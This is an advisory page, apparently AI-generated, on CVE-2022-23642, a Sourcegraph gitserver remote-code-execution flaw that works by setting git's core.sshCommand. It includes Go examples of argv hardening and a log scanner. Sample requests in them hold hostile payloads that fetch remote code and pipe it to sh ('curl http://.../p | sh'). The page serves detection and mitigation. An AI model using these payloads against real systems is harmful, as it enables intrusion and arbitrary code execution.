CVE-2022-23642 Overview
CVE-2022-23642 is a Remote Code Execution (RCE) vulnerability affecting Sourcegraph, a code search and navigation engine. The vulnerability exists in the gitserver service, which acts as a git exec proxy but fails to properly restrict calling git config. This flaw allows an attacker to set the git core.sshCommand option, which instructs git to use a specified command instead of ssh when connecting to remote systems, enabling arbitrary command execution.
Critical Impact
Remote attackers with the ability to make HTTP requests to internal services like gitserver can achieve remote code execution on affected Sourcegraph installations prior to version 3.37.
Affected Products
- Sourcegraph versions prior to 3.37
- Sourcegraph gitserver service component
Discovery Timeline
- February 18, 2022 - CVE-2022-23642 published to NVD
- November 21, 2024 - Last updated in NVD database
Technical Details for CVE-2022-23642
Vulnerability Analysis
The vulnerability is classified as code injection (CWE-94) combined with missing authorization (CWE-862) in the Sourcegraph gitserver service. gitserver is designed to act as a proxy that runs git commands on behalf of other Sourcegraph services, but it does not restrict which git subcommands a caller may invoke and does not check who the caller is. In particular, nothing prevents a request from running git config, so anyone who can reach the service can rewrite the configuration of any repository it hosts.
The most direct exploitation path is the core.sshCommand option. When git needs to reach a remote repository over SSH it runs the command named by this option instead of ssh, passing it the host and the remote git command as arguments. An attacker who sets core.sshCommand to a payload of their choice therefore has that payload executed the next time git opens an SSH connection for the affected repository, for example on a scheduled fetch, or on a fetch or ls-remote against an ssh:// remote that the attacker requests through the same proxy. Because git config without --global writes to the repository's own config file, the setting persists on disk until it is removed.
The exploitability of this vulnerability depends on the deployment architecture of Sourcegraph. In configurations where the gitserver service is accessible to attackers—either directly exposed or reachable through other compromised services—the vulnerability can be exploited remotely with low complexity and low privilege requirements.
Root Cause
The root cause is that gitserver forwards the caller's git arguments to the git binary with no allowlist of permitted subcommands and no authorization check on the caller. Because git config is therefore reachable, a security-sensitive setting such as core.sshCommand can be rewritten by anyone able to send the request, which turns a configuration write into command execution in the gitserver process.
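To make the root cause concrete, here is an added example, written for this page and not Sourcegraph's code or the fix shipped in 3.37, of a minimal Go "git exec proxy" that shows the vulnerable behaviour next to an allowlist-based hardening. The ExecRequest field names, the allowlist contents and the ErrForbidden error are assumptions for the example. It also covers a point the page does not spell out: git's global options -c key=value and --config-env set configuration without ever invoking the config subcommand, so filtering config alone is not enough.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// Constructed example of a gitserver-style "git exec proxy". It is not
// Sourcegraph's code and not the fix shipped in 3.37; it only illustrates the
// class of bug. Field names, the allowlist and ErrForbidden are assumptions.

// ExecRequest is the caller's request: run "git <Args...>" inside Repo.
type ExecRequest struct {
	Repo string
	Args []string
}

// vulnerableArgv is the pre-fix behaviour: whatever the caller sends is run.
// A request with Args = {"config", "core.sshCommand", "<payload>"} therefore
// rewrites the repository's config, and the payload runs at the next SSH fetch.
func vulnerableArgv(req ExecRequest) []string {
	return append([]string{"git"}, req.Args...)
}

// allowedSubcommands is the closed set of read-only subcommands the proxy is
// expected to serve. "config" is deliberately absent, as are "fetch" and
// "clone", which a proxy should run on its own schedule rather than on request.
var allowedSubcommands = map[string]bool{
	"rev-parse": true, "log": true, "show": true, "diff": true, "blame": true,
	"ls-files": true, "ls-tree": true, "cat-file": true, "rev-list": true,
	"symbolic-ref": true,
}

var ErrForbidden = errors.New("forbidden git invocation")

// hardenedArgv returns the argv to execute, or ErrForbidden.
func hardenedArgv(req ExecRequest) ([]string, error) {
	if len(req.Args) == 0 {
		return nil, fmt.Errorf("%w: empty argv", ErrForbidden)
	}
	// Args[0] must be an allowlisted subcommand. This single rule also
	// rejects git's global options "-c key=value" and "--config-env", which
	// must precede the subcommand and would set core.sshCommand without
	// ever invoking "config".
	sub := req.Args[0]
	if !allowedSubcommands[sub] {
		return nil, fmt.Errorf("%w: subcommand %q", ErrForbidden, sub)
	}
	// Defence in depth: git config keys are case-insensitive, so compare
	// lower-cased, and refuse anything that still names the option.
	for _, a := range req.Args[1:] {
		if strings.Contains(strings.ToLower(a), "core.sshcommand") {
			return nil, fmt.Errorf("%w: argument %q", ErrForbidden, a)
		}
	}
	return append([]string{"git"}, req.Args...), nil
}

func main() {
	// Constructed requests: the page's attack, the -c variant, and a benign call.
	requests := []ExecRequest{
		{Repo: "github.com/acme/app", Args: []string{"config", "core.sshCommand", "curl http://198.51.100.9/p | sh"}},
		{Repo: "github.com/acme/app", Args: []string{"-c", "core.sshCommand=id", "fetch", "ssh://198.51.100.9/repo"}},
		{Repo: "github.com/acme/app", Args: []string{"rev-parse", "HEAD"}},
	}
	for _, r := range requests {
		fmt.Printf("vulnerable runs: %q\n", vulnerableArgv(r))
		if argv, err := hardenedArgv(r); err != nil {
			fmt.Printf("hardened rejects: %v\n", err)
		} else {
			fmt.Printf("hardened runs:   %q\n", argv)
		}
	}
}
```

A subcommand allowlist is the minimum, not the whole fix: several of the allowed subcommands still accept options that touch the filesystem or run external programs (git log --output=<file>, git diff --ext-diff), so a production proxy should also constrain the options it forwards, and the service should authenticate its callers rather than rely on network position alone.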
Attack Vector
The attack is network-based: the attacker needs to be able to send HTTP requests to the internal gitserver service, either because it is exposed or because they already control another service that can reach it. Exploitation follows this pattern:
- The attacker sends gitserver an exec request whose git arguments are a git config invocation
- That request sets core.sshCommand to an attacker-controlled command, which git writes into the target repository's config file
- The next time git opens an SSH connection for that repository (a scheduled update, or a fetch or ls-remote against an ssh:// remote that the attacker requests through the same proxy), git runs the configured command instead of ssh
- The attacker's command executes with the privileges of the gitserver process
The vulnerability has been documented in public exploit databases. Technical details and proof-of-concept exploits have been published on Packet Storm (listed there as "RCE Exploit" and "RCE via SSH Command").
Detection Methods for CVE-2022-23642
Indicators of Compromise
- Unexpected git config commands in gitserver service logs, particularly those setting core.sshCommand
- Anomalous HTTP requests targeting the gitserver service endpoint
- Unusual process spawning from git or gitserver processes
- Repository config files on gitserver containing a core.sshCommand entry that your own deployment did not put there
Detection Strategies
- Monitor HTTP traffic to gitserver endpoints for requests containing git config commands
- Implement application-level logging to capture all git operations executed through the proxy
- Deploy network intrusion detection rules to identify exploitation attempts targeting Sourcegraph services
- Review system process trees for unexpected child processes spawned by git operations
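The indicators and detection strategies above reduce to one check on each request the proxy logs. As an added example, not from this page or from Sourcegraph, the following Go scanner runs that check over constructed gitserver-style JSON request logs; the log field names, timestamps and addresses are invented for the example. It rates any argv that mentions core.sshCommand (including the -c and --config-env forms) as high and any other write through git config as medium, while leaving read-only config lookups alone.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Constructed sample of gitserver-style request logs, one JSON object per
// line. The field names are assumed for this example; map them onto whatever
// your gitserver request logging actually emits.
const sampleLog = `{"ts":"2022-02-18T10:00:01Z","remote_addr":"10.0.0.5","repo":"github.com/acme/app","args":["rev-parse","HEAD"]}
{"ts":"2022-02-18T10:00:02Z","remote_addr":"10.0.0.5","repo":"github.com/acme/app","args":["config","--get","remote.origin.url"]}
{"ts":"2022-02-18T10:00:03Z","remote_addr":"203.0.113.7","repo":"github.com/acme/app","args":["config","core.sshCommand","curl http://203.0.113.7/x | sh"]}
{"ts":"2022-02-18T10:00:04Z","remote_addr":"203.0.113.7","repo":"github.com/acme/app","args":["-c","core.sshcommand=touch /tmp/pwned","fetch","ssh://203.0.113.7/repo"]}
{"ts":"2022-02-18T10:00:05Z","remote_addr":"10.0.0.5","repo":"github.com/acme/app","args":["log","-n","1"]}
{"ts":"2022-02-18T10:00:06Z","remote_addr":"10.0.0.5","repo":"github.com/acme/app","args":["config","user.name","bot"]}`

type record struct {
	TS         string   `json:"ts"`
	RemoteAddr string   `json:"remote_addr"`
	Repo       string   `json:"repo"`
	Args       []string `json:"args"`
}

// Finding is one suspicious request. Severity is "high" when core.sshCommand
// is named anywhere in the argv, "medium" for any other config write.
type Finding struct {
	Severity string
	Reason   string
	Record   record
}

// readOnlyConfigFlags are the "git config" forms that only read settings.
var readOnlyConfigFlags = map[string]bool{
	"--get": true, "--get-all": true, "--get-regexp": true, "--list": true, "-l": true,
}

// classify inspects one argv as it was handed to the exec proxy.
func classify(args []string) (severity, reason string) {
	if len(args) == 0 {
		return "", ""
	}
	for _, a := range args {
		// git config keys are case-insensitive, so match lower-cased.
		if strings.Contains(strings.ToLower(a), "core.sshcommand") {
			return "high", "core.sshCommand referenced in git argv"
		}
	}
	switch {
	case args[0] == "config":
		for _, a := range args[1:] {
			if readOnlyConfigFlags[a] {
				return "", ""
			}
		}
		return "medium", "git config invoked in a write form through the proxy"
	case args[0] == "-c", args[0] == "--config-env", strings.HasPrefix(args[0], "--config-env="):
		return "medium", "configuration injected via a global git option"
	}
	return "", ""
}

// Scan parses newline-delimited JSON records and returns every suspicious one,
// in log order. Malformed lines are skipped so one bad record cannot hide the rest.
func Scan(log string) []Finding {
	var out []Finding
	for _, line := range strings.Split(log, "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		var r record
		if err := json.Unmarshal([]byte(line), &r); err != nil {
			continue
		}
		if sev, why := classify(r.Args); sev != "" {
			out = append(out, Finding{Severity: sev, Reason: why, Record: r})
		}
	}
	return out
}

func main() {
	for _, f := range Scan(sampleLog) {
		fmt.Printf("%-6s %s %s %s args=%q: %s\n",
			f.Severity, f.Record.TS, f.Record.RemoteAddr, f.Record.Repo, f.Record.Args, f.Reason)
	}
}
```

On the constructed log this reports the two core.sshCommand writes from 203.0.113.7 as high and the user.name write as medium; the rev-parse, log and config --get requests produce nothing. The same classification belongs in the alerting rule for gitserver request logs, with the medium tier tuned to whatever config writes your own deployment legitimately performs.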
Monitoring Recommendations
- Enable verbose logging for the gitserver service to capture all git command executions
- Implement network segmentation monitoring to detect unauthorized access to internal services
- Set up alerts for modifications to git configuration files across the Sourcegraph deployment
- Monitor for outbound connections from gitserver processes to unexpected destinations
How to Mitigate CVE-2022-23642
Immediate Actions Required
- Upgrade Sourcegraph to version 3.37 or later immediately
- Restrict network access to the gitserver service to only authorized internal components
- Review logs for signs of exploitation attempts or successful compromise
- Implement network segmentation to isolate internal Sourcegraph services from untrusted networks
Patch Information
Sourcegraph has released version 3.37 which addresses this vulnerability. The fix is documented in GitHub Pull Request #30833. Organizations should upgrade to the patched version as soon as possible. For detailed information about the security fix, refer to GitHub Security Advisory GHSA-qcmp-fx72-q8q9.
Workarounds
- Ensure that gitserver's HTTP API is reachable only from trusted Sourcegraph services; the advisory treats the ability to send it HTTP requests as the only precondition, so network reachability is the effective trust boundary
- Implement network-level access controls (firewall rules, security groups, Kubernetes NetworkPolicy) to restrict access to the gitserver service
- A reverse proxy or web application firewall in front of gitserver can block requests whose git arguments include config, -c or core.sshCommand, but treat this as a stopgap that only holds if every path to gitserver goes through it
- Disabling external repository synchronization reduces the chance that a planted core.sshCommand fires on a scheduled fetch, but it does not close the hole: an attacker who can reach the exec endpoint can request a fetch or ls-remote against an ssh:// remote and trigger the payload directly
# Network access restriction example (iptables)
# Restrict gitserver (default TCP port 3178) to known Sourcegraph callers.
# <frontend_ip> stands for each component that legitimately calls gitserver
# (frontend, repo-updater, searcher, symbols, ...); add one ACCEPT per source.
# Rule order matters: the ACCEPT must precede the DROP, and if the chain
# already holds a broad ACCEPT rule use -I instead of -A so these land first.
# Host INPUT rules do not see traffic forwarded to containers; in Docker or
# Kubernetes deployments express the same policy in the container network
# (DOCKER-USER chain, NetworkPolicy) instead.
iptables -A INPUT -p tcp --dport 3178 -s <frontend_ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 3178 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

